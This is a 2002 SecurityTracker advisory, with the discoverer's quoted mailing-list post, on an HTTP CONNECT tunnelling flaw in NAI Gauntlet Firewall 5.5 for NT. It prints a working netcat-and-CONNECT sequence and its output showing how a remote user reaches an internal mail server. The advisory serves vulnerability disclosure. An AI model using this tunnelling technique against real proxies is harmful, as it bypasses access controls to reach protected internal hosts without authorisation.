Network Associates Gauntlet Firewall Proxy Bug Lets Remote Users Bypass Some Access Controls and Connect to Arbitrary Ports on Internal/Protected Hosts
|
|
SecurityTracker Alert ID: 1003700 |
|
SecurityTracker URL: http://securitytracker.com/id/1003700
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 1 2002
|
Impact:
Host/resource access via network
|
Exploit Included: Yes
|
Version(s): 5.5
|
Description:
An access control vulnerability was reported in the Gauntlet firewall. A remote user can bypass access controls and connect to arbitrary ports on servers located behind the firewall via the HTTP Proxy.
A remote user can reportedly initiate a connection to an IP addresses and web port located behind the firewall. Then, the remote user can apparenly apply the CONNECT method to connect to another server, different from the IP address originally specified in the connection.
For example, a remote user can use "telnet [webserver_address] 80" to attempt to connect to a protected webserver. At the HTTP proxy menu, the remote user can reportedly enter the following to connect to a different protected server that the user is not authorized to connect to:
CONNECT [other_server]:[arbitrary_port] / HTTP/1.0
|
Impact:
A remote user can bypass access controls and access arbitrary ports on protected servers that the user is not authorized to connect to.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.pgp.com/products/gauntlet/default.asp (Links to External Site)
|
Cause:
Access control error, State error
|
Underlying OS:
Windows (NT)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 28 Feb 2002 18:33:26 +0400
Subject: NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)
|
Hi all,
I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.
I don't know if this was published earlier or not, but here it goes:
Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)
Examples: (I'm using Volker Tanger [volker.tanger@discon.de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)
Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z
nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0
HTTP/1.0 200 OK
mail server banner
That's it!
Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net
_______________________________________________
The preceding E-mail message contains information that is confidential,
may be protected by the attorney-client or other applicable privileges,
and may constitute non-public information, which is intended to be
conveyed only to the designated recipients (s). If you are not an
intended recipient of this message, please notify the sender at (+9714)
391 3040 or via same e-mail. Unauthorized use, dissemination,
distribution, or reproduction of this message is strictly prohibited and
may be unlawful. Internet communications cannot be guaranteed to be
secured or error-free as information could be intercepted, corrupted,
lost, arrive late or contain viruses. The sender therefore does not
accept liability for any errors or omissions in the context of this
message which arise as a result of Internet transmission.
|
|
